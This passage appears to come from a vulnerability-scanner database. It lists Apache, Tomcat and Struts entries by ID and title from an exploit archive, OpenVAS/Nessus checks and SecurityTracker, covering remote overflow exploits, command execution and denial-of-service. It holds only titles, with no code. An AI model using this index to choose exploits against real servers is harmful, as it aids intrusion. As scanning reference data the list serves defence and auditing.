7379| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
7380| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
7381| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
7382| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
7383| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
7384| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
7385| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
7386| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
7387| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
7388| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
7389| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
7390| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
7391| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
7392| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
7393| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
7394| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
7395| [20558] Apache 1.2 Web Server DoS Vulnerability
7396| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
7397| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
7398| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
7399| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
7400| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
7401| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
7402| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
7403| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
7404| [19231] PHP apache_request_headers Function Buffer Overflow
7405| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
7406| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
7407| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
7408| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
7409| [18442] Apache httpOnly Cookie Disclosure
7410| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
7411| [18221] Apache HTTP Server Denial of Service
7412| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
7413| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
7414| [17691] Apache Struts < 2.2.0 - Remote Command Execution
7415| [16798] Apache mod_jk 1.2.20 Buffer Overflow
7416| [16782] Apache Win32 Chunked Encoding
7417| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
7418| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
7419| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
7420| [15319] Apache 2.2 (Windows) Local Denial of Service
7421| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
7422| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7423| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
7424| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
7425| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
7426| [12330] Apache OFBiz - Multiple XSS
7427| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
7428| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
7429| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
7430| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
7431| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
7432| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
7433| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
7434| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7435| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7436| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
7437| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
7438| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
7439| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7440| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
7441| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
7442| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
7443| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
7444| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
7445| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
7446| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
7447| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
7448| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
7449| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
7450| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
7451| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
7452| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
7453| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
7454| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
7455| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
7456| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
7457| [466] htpasswd Apache 1.3.31 - Local Exploit
7458| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
7459| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
7460| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
7461| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
7462| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
7463| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
7464| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
7465| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
7466| [9] Apache HTTP Server 2.x Memory Leak Exploit
7467|
7468| OpenVAS (Nessus) - http://www.openvas.org:
7469| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
7470| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
7471| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
7472| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
7473| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
7474| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
7475| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
7476| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
7477| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
7478| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
7479| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
7480| [900571] Apache APR-Utils Version Detection
7481| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
7482| [900496] Apache Tiles Multiple XSS Vulnerability
7483| [900493] Apache Tiles Version Detection
7484| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
7485| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
7486| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
7487| [870175] RedHat Update for apache RHSA-2008:0004-01
7488| [864591] Fedora Update for apache-poi FEDORA-2012-10835
7489| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
7490| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
7491| [864250] Fedora Update for apache-poi FEDORA-2012-7683
7492| [864249] Fedora Update for apache-poi FEDORA-2012-7686
7493| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
7494| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
7495| [855821] Solaris Update for Apache 1.3 122912-19
7496| [855812] Solaris Update for Apache 1.3 122911-19
7497| [855737] Solaris Update for Apache 1.3 122911-17
7498| [855731] Solaris Update for Apache 1.3 122912-17
7499| [855695] Solaris Update for Apache 1.3 122911-16
7500| [855645] Solaris Update for Apache 1.3 122912-16
7501| [855587] Solaris Update for kernel update and Apache 108529-29
7502| [855566] Solaris Update for Apache 116973-07
7503| [855531] Solaris Update for Apache 116974-07
7504| [855524] Solaris Update for Apache 2 120544-14
7505| [855494] Solaris Update for Apache 1.3 122911-15
7506| [855478] Solaris Update for Apache Security 114145-11
7507| [855472] Solaris Update for Apache Security 113146-12
7508| [855179] Solaris Update for Apache 1.3 122912-15
7509| [855147] Solaris Update for kernel update and Apache 108528-29
7510| [855077] Solaris Update for Apache 2 120543-14
7511| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
7512| [850088] SuSE Update for apache2 SUSE-SA:2007:061
7513| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
7514| [841209] Ubuntu Update for apache2 USN-1627-1
7515| [840900] Ubuntu Update for apache2 USN-1368-1
7516| [840798] Ubuntu Update for apache2 USN-1259-1
7517| [840734] Ubuntu Update for apache2 USN-1199-1
7518| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
7519| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
7520| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
7521| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
7522| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
7523| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
7524| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
7525| [835253] HP-UX Update for Apache Web Server HPSBUX02645
7526| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
7527| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
7528| [835236] HP-UX Update for Apache with PHP HPSBUX02543
7529| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
7530| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
7531| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
7532| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
7533| [835188] HP-UX Update for Apache HPSBUX02308
7534| [835181] HP-UX Update for Apache With PHP HPSBUX02332
7535| [835180] HP-UX Update for Apache with PHP HPSBUX02342
7536| [835172] HP-UX Update for Apache HPSBUX02365
7537| [835168] HP-UX Update for Apache HPSBUX02313
7538| [835148] HP-UX Update for Apache HPSBUX01064
7539| [835139] HP-UX Update for Apache with PHP HPSBUX01090
7540| [835131] HP-UX Update for Apache HPSBUX00256
7541| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
7542| [835104] HP-UX Update for Apache HPSBUX00224
7543| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
7544| [835101] HP-UX Update for Apache HPSBUX01232
7545| [835080] HP-UX Update for Apache HPSBUX02273
7546| [835078] HP-UX Update for ApacheStrong HPSBUX00255
7547| [835044] HP-UX Update for Apache HPSBUX01019
7548| [835040] HP-UX Update for Apache PHP HPSBUX00207
7549| [835025] HP-UX Update for Apache HPSBUX00197
7550| [835023] HP-UX Update for Apache HPSBUX01022
7551| [835022] HP-UX Update for Apache HPSBUX02292
7552| [835005] HP-UX Update for Apache HPSBUX02262
7553| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
7554| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
7555| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
7556| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
7557| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
7558| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
7559| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
7560| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
7561| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
7562| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
7563| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
7564| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
7565| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
7566| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
7567| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
7568| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
7569| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
7570| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
7571| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
7572| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
7573| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
7574| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
7575| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
7576| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
7577| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
7578| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
7579| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
7580| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
7581| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
7582| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
7583| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
7584| [801942] Apache Archiva Multiple Vulnerabilities
7585| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
7586| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
7587| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
7588| [801284] Apache Derby Information Disclosure Vulnerability
7589| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
7590| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
7591| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
7592| [800680] Apache APR Version Detection
7593| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
7594| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
7595| [800677] Apache Roller Version Detection
7596| [800279] Apache mod_jk Module Version Detection
7597| [800278] Apache Struts Cross Site Scripting Vulnerability
7598| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
7599| [800276] Apache Struts Version Detection
7600| [800271] Apache Struts Directory Traversal Vulnerability
7601| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
7602| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
7603| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
7604| [103122] Apache Web Server ETag Header Information Disclosure Weakness
7605| [103074] Apache Continuum Cross Site Scripting Vulnerability
7606| [103073] Apache Continuum Detection
7607| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
7608| [101023] Apache Open For Business Weak Password security check
7609| [101020] Apache Open For Business HTML injection vulnerability
7610| [101019] Apache Open For Business service detection
7611| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
7612| [100923] Apache Archiva Detection
7613| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
7614| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
7615| [100813] Apache Axis2 Detection
7616| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
7617| [100795] Apache Derby Detection
7618| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
7619| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
7620| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
7621| [100514] Apache Multiple Security Vulnerabilities
7622| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
7623| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
7624| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
7625| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7626| [72626] Debian Security Advisory DSA 2579-1 (apache2)
7627| [72612] FreeBSD Ports: apache22
7628| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
7629| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
7630| [71512] FreeBSD Ports: apache
7631| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
7632| [71256] Debian Security Advisory DSA 2452-1 (apache2)
7633| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
7634| [70737] FreeBSD Ports: apache
7635| [70724] Debian Security Advisory DSA 2405-1 (apache2)
7636| [70600] FreeBSD Ports: apache
7637| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
7638| [70235] Debian Security Advisory DSA 2298-2 (apache2)
7639| [70233] Debian Security Advisory DSA 2298-1 (apache2)
7640| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
7641| [69338] Debian Security Advisory DSA 2202-1 (apache2)
7642| [67868] FreeBSD Ports: apache
7643| [66816] FreeBSD Ports: apache
7644| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
7645| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
7646| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
7647| [66081] SLES11: Security update for Apache 2
7648| [66074] SLES10: Security update for Apache 2
7649| [66070] SLES9: Security update for Apache 2
7650| [65998] SLES10: Security update for apache2-mod_python
7651| [65893] SLES10: Security update for Apache 2
7652| [65888] SLES10: Security update for Apache 2
7653| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
7654| [65510] SLES9: Security update for Apache 2
7655| [65472] SLES9: Security update for Apache
7656| [65467] SLES9: Security update for Apache
7657| [65450] SLES9: Security update for apache2
7658| [65390] SLES9: Security update for Apache2
7659| [65363] SLES9: Security update for Apache2
7660| [65309] SLES9: Security update for Apache and mod_ssl
7661| [65296] SLES9: Security update for webdav apache module
7662| [65283] SLES9: Security update for Apache2
7663| [65249] SLES9: Security update for Apache 2
7664| [65230] SLES9: Security update for Apache 2
7665| [65228] SLES9: Security update for Apache 2
7666| [65212] SLES9: Security update for apache2-mod_python
7667| [65209] SLES9: Security update for apache2-worker
7668| [65207] SLES9: Security update for Apache 2
7669| [65168] SLES9: Security update for apache2-mod_python
7670| [65142] SLES9: Security update for Apache2
7671| [65136] SLES9: Security update for Apache 2
7672| [65132] SLES9: Security update for apache
7673| [65131] SLES9: Security update for Apache 2 oes/CORE
7674| [65113] SLES9: Security update for apache2
7675| [65072] SLES9: Security update for apache and mod_ssl
7676| [65017] SLES9: Security update for Apache 2
7677| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
7678| [64783] FreeBSD Ports: apache
7679| [64774] Ubuntu USN-802-2 (apache2)
7680| [64653] Ubuntu USN-813-2 (apache2)
7681| [64559] Debian Security Advisory DSA 1834-2 (apache2)
7682| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
7683| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
7684| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
7685| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
7686| [64443] Ubuntu USN-802-1 (apache2)
7687| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
7688| [64423] Debian Security Advisory DSA 1834-1 (apache2)
7689| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
7690| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
7691| [64251] Debian Security Advisory DSA 1816-1 (apache2)
7692| [64201] Ubuntu USN-787-1 (apache2)
7693| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
7694| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
7695| [63565] FreeBSD Ports: apache
7696| [63562] Ubuntu USN-731-1 (apache2)
7697| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
7698| [61185] FreeBSD Ports: apache
7699| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
7700| [60387] Slackware Advisory SSA:2008-045-02 apache
7701| [58826] FreeBSD Ports: apache-tomcat
7702| [58825] FreeBSD Ports: apache-tomcat
7703| [58804] FreeBSD Ports: apache
7704| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
7705| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
7706| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
7707| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
7708| [57335] Debian Security Advisory DSA 1167-1 (apache)
7709| [57201] Debian Security Advisory DSA 1131-1 (apache)
7710| [57200] Debian Security Advisory DSA 1132-1 (apache2)
7711| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
7712| [57145] FreeBSD Ports: apache
7713| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
7714| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
7715| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
7716| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
7717| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
7718| [56067] FreeBSD Ports: apache
7719| [55803] Slackware Advisory SSA:2005-310-04 apache
7720| [55519] Debian Security Advisory DSA 839-1 (apachetop)
7721| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
7722| [55355] FreeBSD Ports: apache
7723| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
7724| [55261] Debian Security Advisory DSA 805-1 (apache2)
7725| [55259] Debian Security Advisory DSA 803-1 (apache)
7726| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
7727| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
7728| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
7729| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
7730| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
7731| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
7732| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
7733| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
7734| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
7735| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
7736| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
7737| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
7738| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
7739| [54439] FreeBSD Ports: apache
7740| [53931] Slackware Advisory SSA:2004-133-01 apache
7741| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
7742| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
7743| [53878] Slackware Advisory SSA:2003-308-01 apache security update
7744| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
7745| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
7746| [53848] Debian Security Advisory DSA 131-1 (apache)
7747| [53784] Debian Security Advisory DSA 021-1 (apache)
7748| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
7749| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
7750| [53735] Debian Security Advisory DSA 187-1 (apache)
7751| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
7752| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
7753| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
7754| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
7755| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
7756| [53282] Debian Security Advisory DSA 594-1 (apache)
7757| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
7758| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
7759| [53215] Debian Security Advisory DSA 525-1 (apache)
7760| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
7761| [52529] FreeBSD Ports: apache+ssl
7762| [52501] FreeBSD Ports: apache
7763| [52461] FreeBSD Ports: apache
7764| [52390] FreeBSD Ports: apache
7765| [52389] FreeBSD Ports: apache
7766| [52388] FreeBSD Ports: apache
7767| [52383] FreeBSD Ports: apache
7768| [52339] FreeBSD Ports: apache+mod_ssl
7769| [52331] FreeBSD Ports: apache
7770| [52329] FreeBSD Ports: ru-apache+mod_ssl
7771| [52314] FreeBSD Ports: apache
7772| [52310] FreeBSD Ports: apache
7773| [15588] Detect Apache HTTPS
7774| [15555] Apache mod_proxy content-length buffer overflow
7775| [15554] Apache mod_include priviledge escalation
7776| [14771] Apache <= 1.3.33 htpasswd local overflow
7777| [14177] Apache mod_access rule bypass
7778| [13644] Apache mod_rootme Backdoor
7779| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
7780| [12280] Apache Connection Blocking Denial of Service
7781| [12239] Apache Error Log Escape Sequence Injection
7782| [12123] Apache Tomcat source.jsp malformed request information disclosure
7783| [12085] Apache Tomcat servlet/JSP container default files
7784| [11438] Apache Tomcat Directory Listing and File disclosure
7785| [11204] Apache Tomcat Default Accounts
7786| [11092] Apache 2.0.39 Win32 directory traversal
7787| [11046] Apache Tomcat TroubleShooter Servlet Installed
7788| [11042] Apache Tomcat DOS Device Name XSS
7789| [11041] Apache Tomcat /servlet Cross Site Scripting
7790| [10938] Apache Remote Command Execution via .bat files
7791| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
7792| [10773] MacOS X Finder reveals contents of Apache Web files
7793| [10766] Apache UserDir Sensitive Information Disclosure
7794| [10756] MacOS X Finder reveals contents of Apache Web directories
7795| [10752] Apache Auth Module SQL Insertion Attack
7796| [10704] Apache Directory Listing
7797| [10678] Apache /server-info accessible
7798| [10677] Apache /server-status accessible
7799| [10440] Check for Apache Multiple / vulnerability
7800|
7801| SecurityTracker - https://www.securitytracker.com:
7802| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
7803| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
7804| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
7805| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
7806| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
7807| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7808| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7809| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
7810| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
7811| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
7812| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
7813| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
7814| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
7815| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
7816| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
7817| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
7818| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
7819| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
7820| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
7821| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
7822| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
7823| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
7824| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
7825| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
7826| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
7827| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
7828| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
